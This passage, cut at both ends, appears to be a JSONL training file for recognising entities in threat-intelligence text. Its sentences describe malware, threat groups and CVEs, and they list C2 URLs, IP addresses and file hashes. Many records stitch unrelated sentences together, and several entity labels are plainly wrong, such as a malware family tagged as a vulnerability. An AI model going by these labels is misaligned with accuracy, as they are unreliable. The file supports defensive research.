[[410, 420]]}, "info": {"id": "cyberner_stix_train_006013", "source": "cyberner_stix_train"}} {"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . 
The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) .", "spans": {"MALWARE: wuaupdt.exe": [[0, 11]], "TOOL: CMD": [[17, 20]], "TOOL: Data Execution Prevention": [[258, 283]], "TOOL: DEP": [[286, 289]], "TOOL: Address Space Layout Randomization": [[295, 329]], "TOOL: ASLR": [[332, 336]]}, "info": {"id": "cyberner_stix_train_006014", "source": "cyberner_stix_train"}} {"text": "Figure 26 : the kill switch code snippet Evidence implies that the “ Agent Smith ” actor is currently laying the groundwork , increasing its Google Play penetration rate and waiting for the right timing to kick off attacks . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list . In our research , we were also able to track two groups targeting the hospitality sector , using separate but similar infrastructure , tools and techniques . There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns .", "spans": {"MALWARE: Agent Smith": [[69, 80]], "SYSTEM: Google Play": [[141, 152]], "MALWARE: botnet encompassed": [[288, 306]], "ORGANIZATION: financial institutions": [[381, 403]], "SYSTEM: Cisco Secure protections": [[621, 645]], "THREAT_ACTOR: the types of spam": [[673, 690]]}, "info": {"id": "cyberner_stix_train_006015", "source": "cyberner_stix_train"}} {"text": "other features , but these aren ’ t as effective . While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks . 
0xdead ) All protocols use their standard assigned ports.[2][3 ] Dragonfly has used SMB for C2.[4 ]", "spans": {"THREAT_ACTOR: Gorgon Group": [[57, 69]], "THREAT_ACTOR: Dragonfly": [[263, 272]], "TOOL: SMB": [[282, 285]], "SYSTEM: C2.[4": [[290, 295]]}, "info": {"id": "cyberner_stix_train_006016", "source": "cyberner_stix_train"}} {"text": "However , FinFisher is in a different category of malware for the level of its anti-analysis protection . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . The commands are pretty much self-explanatory . This indicates that the threat actor is likely capable of quickly developing similar capabilities against other OT systems from different original equipment manufacturers ( OEMs ) leveraged across the world .", "spans": {"MALWARE: FinFisher": [[10, 19]], "THREAT_ACTOR: Spring Dragon group": [[120, 139]], "VULNERABILITY: spearphish exploits": [[166, 185]], "THREAT_ACTOR: threat actor": [[316, 328]], "SYSTEM: OT systems": [[404, 414]], "SYSTEM: original equipment manufacturers": [[430, 462]]}, "info": {"id": "cyberner_stix_train_006017", "source": "cyberner_stix_train"}} {"text": "Similar to HummingBad , the malware also fakes device identification information , such as IMEI and IMSI , to download an app twice while seeming like the installation is happening on a different device , thereby doubling the potential revenue . Secureworks® incident responders and Counter Threat Unit™ ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People . We have to validate if a global variable with above-mentioned conditions is assigned to the register . 
While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month ’s review we speculated that Royal might be going through a rebrand .", "spans": {"MALWARE: HummingBad": [[11, 21]], "ORGANIZATION: Secureworks®": [[246, 258]], "ORGANIZATION: CTU": [[306, 309]], "THREAT_ACTOR: BRONZE BUTLER": [[368, 381]], "THREAT_ACTOR: Tick": [[398, 402]], "THREAT_ACTOR: threat group": [[405, 417]], "THREAT_ACTOR: Royal": [[710, 715]]}, "info": {"id": "cyberner_stix_train_006018", "source": "cyberner_stix_train"}} {"text": "Combining timebombs , dynamic code loading , and use of reflection to complicate reverse engineering of the malware . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators .", "spans": {"VULNERABILITY: Carbanak": [[118, 126]], "ORGANIZATION: consumer": [[194, 202]], "TOOL: Carberp": [[294, 301]]}, "info": {"id": "cyberner_stix_train_006019", "source": "cyberner_stix_train"}} {"text": "ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . 
WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: sample": [[36, 42]], "THREAT_ACTOR: OceanLotus": [[52, 62]], "MALWARE: WannaCry": [[108, 116]], "VULNERABILITY: EternalBlue": [[126, 137]], "MALWARE: SMB": [[159, 162]]}, "info": {"id": "cyberner_stix_train_006020", "source": "cyberner_stix_train"}} {"text": "Additional collection of related documents revealed a second first-stage payload that we have named ‘ Cannon ’ .", "spans": {"MALWARE: Cannon": [[102, 108]]}, "info": {"id": "cyberner_stix_train_006021", "source": "cyberner_stix_train"}} {"text": "Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group .", "spans": {"TOOL: UEFI": [[42, 46]], "MALWARE: LoJax": [[64, 69]], "THREAT_ACTOR: Sednit": [[98, 104]]}, "info": {"id": "cyberner_stix_train_006022", "source": "cyberner_stix_train"}} {"text": "jhfrte.jar : This is a java archive file downloaded from server . When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . APT10 ( MenuPass Group ) is a Chinese cyber espionage group that FireEye has tracked since 2009 .", "spans": {"TOOL: Word": [[98, 102]], "THREAT_ACTOR: PLATINUM": [[105, 113]], "VULNERABILITY: CVE-2015-2545": [[219, 232]], "THREAT_ACTOR: attacker": [[266, 274]], "THREAT_ACTOR: APT10": [[348, 353]], "THREAT_ACTOR: MenuPass Group": [[356, 370]], "ORGANIZATION: FireEye": [[413, 420]]}, "info": {"id": "cyberner_stix_train_006023", "source": "cyberner_stix_train"}} {"text": "The Trojan is distributed in Russia and CIS countries . VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 . 
The analysts involved were able to identify command and control ( C2 ) servers , dropper and installation methods , means of persistence , and identify the attack tools that are core to the RAT ’s purpose . The VPNs used by RGB actors occasionally fail , which reveals the IP addresses of the actor 's true origins .", "spans": {"THREAT_ACTOR: VENOMOUS BEAR": [[56, 69]], "TOOL: command and control": [[195, 214]], "TOOL: C2": [[217, 219]], "TOOL: RAT": [[341, 344]], "SYSTEM: The VPNs": [[358, 366]], "THREAT_ACTOR: RGB actors": [[375, 385]], "SYSTEM: the IP addresses": [[420, 436]]}, "info": {"id": "cyberner_stix_train_006024", "source": "cyberner_stix_train"}} {"text": "Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "MALWARE: Epic Turla": [[234, 244]]}, "info": {"id": "cyberner_stix_train_006025", "source": "cyberner_stix_train"}} {"text": "A majority of malware that perform this persistence technique modify the necessary registry keys in ways that do not fit the profile of a legitimate program .", "spans": {}, "info": {"id": "cyberner_stix_train_006026", "source": "cyberner_stix_train"}} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . 
Turla merely uses the Adobe brand to trick users into downloading the malware .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[176, 183]], "THREAT_ACTOR: Turla": [[186, 191]]}, "info": {"id": "cyberner_stix_train_006027", "source": "cyberner_stix_train"}} {"text": "The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor .", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "VULNERABILITY: CVE-2014-6332": [[32, 45]], "TOOL: Emissary": [[144, 152]], "MALWARE: PDF documents": [[288, 301]]}, "info": {"id": "cyberner_stix_train_006028", "source": "cyberner_stix_train"}} {"text": "Several hardcoded applications targeted by the MDM-grabbing command ‘ wifi ’ – this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled . In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA . While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": {"THREAT_ACTOR: NewsBeef": [[226, 234]], "THREAT_ACTOR: Naikon": [[367, 373]], "THREAT_ACTOR: APT30": [[407, 412]]}, "info": {"id": "cyberner_stix_train_006029", "source": "cyberner_stix_train"}} {"text": "We believe the Lazarus group ’s continuous attacks for financial gain are unlikely to stop anytime soon .", "spans": {"THREAT_ACTOR: Lazarus": [[15, 22]]}, "info": {"id": "cyberner_stix_train_006030", "source": "cyberner_stix_train"}} {"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative (ZDI) that was just patched this April . 
Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": {"VULNERABILITY: CVE-2019-0752": [[25, 38]], "ORGANIZATION: Trend Micro’s": [[90, 103]], "MALWARE: sub-domains": [[195, 206]], "VULNERABILITY: exploit": [[214, 221]]}, "info": {"id": "cyberner_stix_train_006031", "source": "cyberner_stix_train"}} {"text": "We present as much public information as possible to support this assessment , but withheld sensitive information that further contributes to our high confidence assessment .", "spans": {}, "info": {"id": "cyberner_stix_train_006032", "source": "cyberner_stix_train"}} {"text": "Guccifer 2.0 continued to leak batches of DNC documents through September .", "spans": {"THREAT_ACTOR: Guccifer": [[0, 8]], "ORGANIZATION: DNC": [[42, 45]]}, "info": {"id": "cyberner_stix_train_006033", "source": "cyberner_stix_train"}} {"text": "This includes testing multiple versions of malicious software , some of which were used by TEMP.Veles during the TRITON intrusion .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[91, 101]], "MALWARE: TRITON": [[113, 119]]}, "info": {"id": "cyberner_stix_train_006034", "source": "cyberner_stix_train"}} {"text": "Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": {"MALWARE: Backdoor": [[0, 8]], "MALWARE: Equation Editor": [[150, 165]], "FILEPATH: EQNEDT32.EXE": [[168, 180]], "ORGANIZATION: Microsoft": [[200, 209]]}, "info": {"id": "cyberner_stix_train_006035", "source": "cyberner_stix_train"}} {"text": "Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide . 
Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": {"MALWARE: Ploutus-D": [[6, 15], [88, 97]], "ORGANIZATION: ATM vendors": [[139, 150]], "MALWARE: SMBs": [[231, 235]], "ORGANIZATION: accountants": [[273, 284]]}, "info": {"id": "cyberner_stix_train_006036", "source": "cyberner_stix_train"}} {"text": "An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes , including monitoring open-source coverage of TRITON , network reconnaissance , and malicious activity in support of the TRITON intrusion .", "spans": {"ORGANIZATION: CNIIHM": [[28, 34]], "THREAT_ACTOR: TEMP.Veles": [[56, 66]], "MALWARE: TRITON": [[136, 142], [211, 217]]}, "info": {"id": "cyberner_stix_train_006037", "source": "cyberner_stix_train"}} {"text": "All archives from this phase contain the same files except for one called “ common ” . Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell . The majority of the victims are associated with the hospitality sector . As a consequence , four trams were derailed and twelve people injured due to resulting emergency stops .", "spans": {"ORGANIZATION: Lookout": [[87, 94]], "TOOL: FrozenCell": [[162, 172]]}, "info": {"id": "cyberner_stix_train_006038", "source": "cyberner_stix_train"}} {"text": "They could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": {"MALWARE: CosmicDuke": [[34, 44]]}, "info": {"id": "cyberner_stix_train_006039", "source": "cyberner_stix_train"}} {"text": "Thanks to Allwinner , a Chinese ARM system-on-a-chip maker , which has recently been caught shipping a version of Linux Kernel with an incredibly simple and easy-to-use built-in backdoor . The threat actors appear to be able to create and leverage multiple SWCs in parallel . 
Outlaw : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 . The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock , a data scientist who worked with the show ’s producers at the Warner Bros. production company Wall to Wall Media .", "spans": {"ORGANIZATION: Allwinner": [[10, 19]], "SYSTEM: ARM": [[32, 35]], "SYSTEM: Linux": [[114, 119]], "TOOL: SWCs": [[257, 261]], "THREAT_ACTOR: Outlaw": [[276, 282]], "FILEPATH: 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79": [[285, 349]], "TOOL: Cryptocurrency miner": [[350, 370]], "MALWARE: Coinminer.Linux.MALXMR.SMDSL64": [[371, 401]], "ORGANIZATION: KrebsOnSecurity": [[465, 480]], "ORGANIZATION: Jeremy Bullock": [[485, 499]], "ORGANIZATION: Warner Bros. production company Wall to Wall Media": [[564, 614]]}, "info": {"id": "cyberner_stix_train_006040", "source": "cyberner_stix_train"}} {"text": "You can find a full list of targeted models in the Appendix . Maudi Surveillance Operation which was previously reported in 2013 . Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia , particularly government entities , since at least 2015 .", "spans": {"THREAT_ACTOR: Maudi": [[62, 67]], "THREAT_ACTOR: Sowbug": [[131, 137]], "ORGANIZATION: government entities": [[265, 284]]}, "info": {"id": "cyberner_stix_train_006041", "source": "cyberner_stix_train"}} {"text": "Of these campaigns , two clusters in particular stand out .", "spans": {}, "info": {"id": "cyberner_stix_train_006042", "source": "cyberner_stix_train"}} {"text": "In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . 
The group has been active since at least January 2013 .", "spans": {"VULNERABILITY: CVE-2012-0158": [[66, 79]], "TOOL: NetTraveler Trojan": [[95, 113]]}, "info": {"id": "cyberner_stix_train_006043", "source": "cyberner_stix_train"}} {"text": "Upon kill chain completion , “ Agent Smith ” will then hijack compromised user apps to show ads . Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems ( ASN ) located in Thailand . While Microsoft Defender Advanced Threat Protection ’s pre-execution detection engines blocked Dexphot in most cases , behavior-based machine learning models provided protection for cases where the threat slipped through . Enterprise T1482 Domain Trust Discovery During the SolarWinds Compromise , APT29 used the Get - AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell .", "spans": {"MALWARE: Agent Smith": [[31, 42]], "ORGANIZATION: Unit 42": [[98, 105]], "TOOL: Bookworm": [[150, 158]], "TOOL: Microsoft Defender Advanced Threat Protection": [[286, 331]], "MALWARE: Dexphot": [[375, 382]], "THREAT_ACTOR: the SolarWinds Compromise": [[550, 575]], "THREAT_ACTOR: APT29": [[578, 583]]}, "info": {"id": "cyberner_stix_train_006044", "source": "cyberner_stix_train"}} {"text": "Google later implemented platform-level changes that practically eliminated this attack surface . On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor . 
“ HexRaysDeob ” The script downloads two files to locations defined by the variables ffn and fn , but only the first file is executed via the system function .", "spans": {"ORGANIZATION: Google": [[0, 6]], "ORGANIZATION: Advanced Threat Research": [[114, 138]], "TOOL: SYSCON backdoor": [[190, 205]], "TOOL: HexRaysDeob": [[210, 221]]}, "info": {"id": "cyberner_stix_train_006045", "source": "cyberner_stix_train"}} {"text": "To that end , it is very unlikely that the United States government or Shell , a global energy company , would commission SilverTerrier actors to develop domains that impersonate their own legitimate websites and services . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": {"ORGANIZATION: government": [[57, 67]], "ORGANIZATION: global energy company": [[81, 102]], "THREAT_ACTOR: SilverTerrier actors": [[122, 142]], "THREAT_ACTOR: Turla": [[231, 236]], "TOOL: emails": [[305, 311]], "ORGANIZATION: German Foreign Office staff": [[324, 351]]}, "info": {"id": "cyberner_stix_train_006046", "source": "cyberner_stix_train"}} {"text": "To mitigate the threat described in this report , iDefense recommends blocking access to the IP address and URI pattern :", "spans": {"ORGANIZATION: iDefense": [[50, 58]]}, "info": {"id": "cyberner_stix_train_006047", "source": "cyberner_stix_train"}} {"text": "Original password The main service follows the same structure as the first version , the anti-analysis features are primitive , only checking the emulator environment without any kind of packing or obfuscation . We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples . 
Although there are no current infrastructure ties to link this backdoor to APT12 , there are several data points that show a possible tie to the same actors : During the SolarWinds Compromise , APT29 gained access through compromised accounts at cloud solution partners , and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems .", "spans": {"TOOL: MoonWind": [[232, 240]], "THREAT_ACTOR: APT12": [[428, 433]], "THREAT_ACTOR: the SolarWinds Compromise": [[519, 544]], "THREAT_ACTOR: APT29": [[547, 552]]}, "info": {"id": "cyberner_stix_train_006048", "source": "cyberner_stix_train"}} {"text": "Android.Oldboot acts as a system service and connects to the command-and-controller server using libgooglekernel.so library and receives commands to download , remove installed apps , and install malicious apps . Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code . APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations , and has demonstrated the capability and intent to steal from dozens of organizations simultaneously . Then , it copies the system file “ rundll32.exe ” to the same directory with name “ ntuser.exe ” and runs it with “ ntuser.bin ” as a parameter , effectively loading the malicious DLL file .", "spans": {"MALWARE: Android.Oldboot": [[0, 15]], "THREAT_ACTOR: APT1": [[354, 358]], "MALWARE: the malicious DLL file": [[717, 739]]}, "info": {"id": "cyberner_stix_train_006049", "source": "cyberner_stix_train"}} {"text": "In one instance the DDE attack was used to deliver and install Zebrocy .", "spans": {"MALWARE: Zebrocy": [[63, 70]]}, "info": {"id": "cyberner_stix_train_006050", "source": "cyberner_stix_train"}} {"text": "] xyzdebra-morgan [ . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" . 
However , it does mean that the intruders need to be able to interface with the ( often graphical ) C2 server software running on the hop . Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service , potentially allowing anyone with a moderate amount of technical ability to carry out advanced , convincing phishing attacks .", "spans": {"MALWARE: Microsoft PowerPoint file": [[43, 68]], "MALWARE: thanks.pps": [[77, 87]], "MALWARE: Microsoft Word document": [[119, 142]], "MALWARE: request.docx": [[151, 163]], "TOOL: C2": [[268, 270]], "THREAT_ACTOR: advanced , convincing phishing attacks": [[539, 577]]}, "info": {"id": "cyberner_stix_train_006051", "source": "cyberner_stix_train"}} {"text": "http://188.241.58.170/local/s3/filters.php https://200.122.181.25/catalog/products/books.php .", "spans": {"URL: http://188.241.58.170/local/s3/filters.php": [[0, 42]], "URL: https://200.122.181.25/catalog/products/books.php": [[43, 92]]}, "info": {"id": "cyberner_stix_train_006052", "source": "cyberner_stix_train"}} {"text": "The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools .", "spans": {"ORGANIZATION: CTU": [[45, 48]]}, "info": {"id": "cyberner_stix_train_006053", "source": "cyberner_stix_train"}} {"text": "By the time of this publication , two Jaguar Kill Switch infected app has reached 10 million downloads while others are still in their early stages . The interest among hackers in targeting trading systems is expected to grow . PaloAlto has already written about one of them . 
Other Snort rules and detection content can prevent the execution of the malware used as the final payload .", "spans": {"ORGANIZATION: PaloAlto": [[228, 236]]}, "info": {"id": "cyberner_stix_train_006054", "source": "cyberner_stix_train"}} {"text": "Brexit 15.11.2018.docx :", "spans": {"FILEPATH: Brexit 15.11.2018.docx": [[0, 22]]}, "info": {"id": "cyberner_stix_train_006055", "source": "cyberner_stix_train"}} {"text": "It opens a socket on the victim ’ s machine and connects with a server-side component of the implant located at 54.67.109.199:6500 . Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months . The group uses a Trojan by the same name ( RTM ) .", "spans": {"ORGANIZATION: ITUC": [[161, 165]], "THREAT_ACTOR: Operation Kingphish": [[191, 210]], "TOOL: social media": [[244, 256]], "TOOL: prominently Facebook": [[259, 279]], "MALWARE: Trojan": [[400, 406]], "THREAT_ACTOR: RTM": [[426, 429]]}, "info": {"id": "cyberner_stix_train_006056", "source": "cyberner_stix_train"}} {"text": "Therefore , our team managed to generate the public key and craft an SMS message that activated the kill switch . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . 
Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": {"THREAT_ACTOR: attackers": [[174, 183]], "VULNERABILITY: exploit": [[319, 326]], "TOOL: Microsoft Windows OLE Remote Code Execution": [[335, 378]], "VULNERABILITY: CVE-2014-6332": [[395, 408]], "ORGANIZATION: Microsoft": [[448, 457]], "SYSTEM: Windows": [[458, 465]]}, "info": {"id": "cyberner_stix_train_006057", "source": "cyberner_stix_train"}} {"text": "Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image . The group has demonstrated access to zero-day vulnerabilities CVE-2018-0802 , and the ability to incorporate them into operations .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "TOOL: dropper": [[43, 50]], "MALWARE: malicious.exe": [[68, 81]], "MALWARE: .dll file": [[85, 94]], "VULNERABILITY: zero-day": [[175, 183]], "VULNERABILITY: CVE-2018-0802": [[200, 213]]}, "info": {"id": "cyberner_stix_train_006058", "source": "cyberner_stix_train"}} {"text": "The frozen TinyML model is useful for making sure images fit the screen without distortion . August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers . 
The summary of the modifications is : What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": {"SYSTEM: TinyML": [[11, 17]], "ORGANIZATION: FireEye": [[107, 114]], "THREAT_ACTOR: Ke3chang": [[183, 191]], "THREAT_ACTOR: attackers": [[192, 201]], "THREAT_ACTOR: the former MiniDuke attackers": [[275, 304]]}, "info": {"id": "cyberner_stix_train_006059", "source": "cyberner_stix_train"}} {"text": "The only purpose of this method is to connect to the C & C server . As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection . IRONHALO : CVE-2015-1701 . This dangerous malware was developed to exploit weaknesses in those systems and the communication protocols they use – systems developed decades ago with almost no security measures .", "spans": {"MALWARE: IRONHALO": [[225, 233]], "VULNERABILITY: CVE-2015-1701": [[236, 249]]}, "info": {"id": "cyberner_stix_train_006060", "source": "cyberner_stix_train"}} {"text": "If it finds apps on its prey list ( hard-coded or sent from C & C server ) , it will extract the base APK of the target innocent app on the device , patch the APK with malicious ads modules , install the APK back and replace the original one as if it is an update . Chitpas is heavily involved with Thailand politics and was a core leader of the People's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 . It hijacked legitimate system processes to disguise malicious activity . 
Cloud Administration Command APT29 has used Azure Run Command and Azure Admin - on - Behalf - of ( AOBO ) to execute code on virtual machines .", "spans": {"ORGANIZATION: politics": [[308, 316]], "THREAT_ACTOR: Cloud Administration Command APT29": [[554, 588]], "SYSTEM: Azure Run Command": [[598, 615]], "SYSTEM: Azure Admin - on - Behalf - of ( AOBO )": [[620, 659]]}, "info": {"id": "cyberner_stix_train_006062", "source": "cyberner_stix_train"}} {"text": "We believe all three circumstances to have coexisted at least to some extent .", "spans": {}, "info": {"id": "cyberner_stix_train_006063", "source": "cyberner_stix_train"}} {"text": "During the timeline of this cyber attack most of these IP addresses were located in Pakistan and few IP addresses used the hosting provider infrastructure .", "spans": {"TOOL: hosting provider infrastructure": [[123, 154]]}, "info": {"id": "cyberner_stix_train_006064", "source": "cyberner_stix_train"}} {"text": "Red Alert Plays Dress-Up In the wild , we found Web pages designed to ( vaguely ) resemble legitimate app market pages , hosting files for download that have been disguised as a legitimate mobile application of moderately broad appeal , such as a media player or social media app . We believe a organization located in Middle East was targeted by APT37 because it had been involved with a North Korean company and a business deal went bad . If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global . 
KillNet previously claimed various links to REvil and Conti , which we were unable to verify , including :", "spans": {"MALWARE: Red Alert": [[0, 9]], "THREAT_ACTOR: APT37": [[347, 352]], "ORGANIZATION: company": [[402, 409]], "THREAT_ACTOR: REvil": [[606, 611]], "THREAT_ACTOR: Conti": [[616, 621]]}, "info": {"id": "cyberner_stix_train_006065", "source": "cyberner_stix_train"}} {"text": "Health_insurance_plan.doc : ecfc0275c7a73a9c7775130ebca45b74 .", "spans": {"FILEPATH: Health_insurance_plan.doc": [[0, 25]], "FILEPATH: ecfc0275c7a73a9c7775130ebca45b74": [[28, 60]]}, "info": {"id": "cyberner_stix_train_006066", "source": "cyberner_stix_train"}} {"text": "] net svc [ . This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco . So when a larger , successful threat actor changes up tactics , the move always piques our attention . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": {"TOOL: KeyBoy": [[78, 84]], "ORGANIZATION: Cisco": [[108, 113]], "MALWARE: Domen toolkit": [[251, 264]], "TOOL: SolarMarker": [[367, 378]], "MALWARE: NetSupport RAT": [[394, 408]]}, "info": {"id": "cyberner_stix_train_006067", "source": "cyberner_stix_train"}} {"text": "As the latest revision of the backdoor , portions of SPLM didn’t match previous reports on SPLM / XAgent while other similarities were maintained .", "spans": {"MALWARE: SPLM": [[53, 57], [91, 95]], "MALWARE: XAgent": [[98, 104]]}, "info": {"id": "cyberner_stix_train_006068", "source": "cyberner_stix_train"}} {"text": "Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[28, 38]], "ORGANIZATION: Mandiant": [[70, 78]]}, "info": 
{"id": "cyberner_stix_train_006069", "source": "cyberner_stix_train"}} {"text": "Though different versions of the app vary in structure , malicious code was initialized at application launch without the user ’ s knowledge , and a number of timers were setup to gather and upload data periodically . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater .", "spans": {"THREAT_ACTOR: Spring Dragon group": [[232, 251]], "VULNERABILITY: spearphish exploits": [[278, 297]], "ORGANIZATION: Talos": [[356, 361]], "THREAT_ACTOR: threat actor MuddyWater": [[467, 490]]}, "info": {"id": "cyberner_stix_train_006070", "source": "cyberner_stix_train"}} {"text": "Quasar version 1.1.0.0 names the encryption module name space “ Encryption ” , while subsequent Quasar versions use “ Cryptography ” – which we observe in this sample .", "spans": {"MALWARE: Quasar version 1.1.0.0": [[0, 22]], "MALWARE: Quasar versions": [[96, 111]]}, "info": {"id": "cyberner_stix_train_006071", "source": "cyberner_stix_train"}} {"text": "It turns out , however , that other security researchers noticed suspicious and faulty code on BLU devices as early as March 2015 , and it has taken nearly that long to remove it from the company 's devices . The attacker gained access to the victim’s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . 
While some of the group ’s tools , tactics , and procedures ( TTPs ) have been covered within this article , it is likely there is much that still remains uncovered .", "spans": {"ORGANIZATION: BLU": [[95, 98]], "THREAT_ACTOR: attacker": [[213, 221]], "TOOL: Citrix": [[272, 278]]}, "info": {"id": "cyberner_stix_train_006072", "source": "cyberner_stix_train"}} {"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.249 [ . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future .", "spans": {"MALWARE: BalkanDoor": [[86, 96]], "VULNERABILITY: CVE-2018-20250": [[281, 295]]}, "info": {"id": "cyberner_stix_train_006073", "source": "cyberner_stix_train"}} {"text": "The U.S. Democratic party's governing body , the Democratic National Committee ( DNC ) , uses the dnc.org domain for its staff email .", "spans": {"ORGANIZATION: Democratic National Committee": [[49, 78]], "ORGANIZATION: DNC": [[81, 84]], "DOMAIN: dnc.org": [[98, 105]], "TOOL: email": [[127, 132]]}, "info": {"id": "cyberner_stix_train_006074", "source": "cyberner_stix_train"}} {"text": "As their infection vectors , these campaigns used malicious documents exploiting recently fixed vulnerabilities .", "spans": {}, "info": {"id": "cyberner_stix_train_006075", "source": "cyberner_stix_train"}} {"text": "The attacker can issue commands ( not all commands appear in different samples ) through the Quasar server GUI for each client :", "spans": {"TOOL: Quasar server GUI": [[93, 110]]}, "info": {"id": "cyberner_stix_train_006076", "source": "cyberner_stix_train"}} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final 
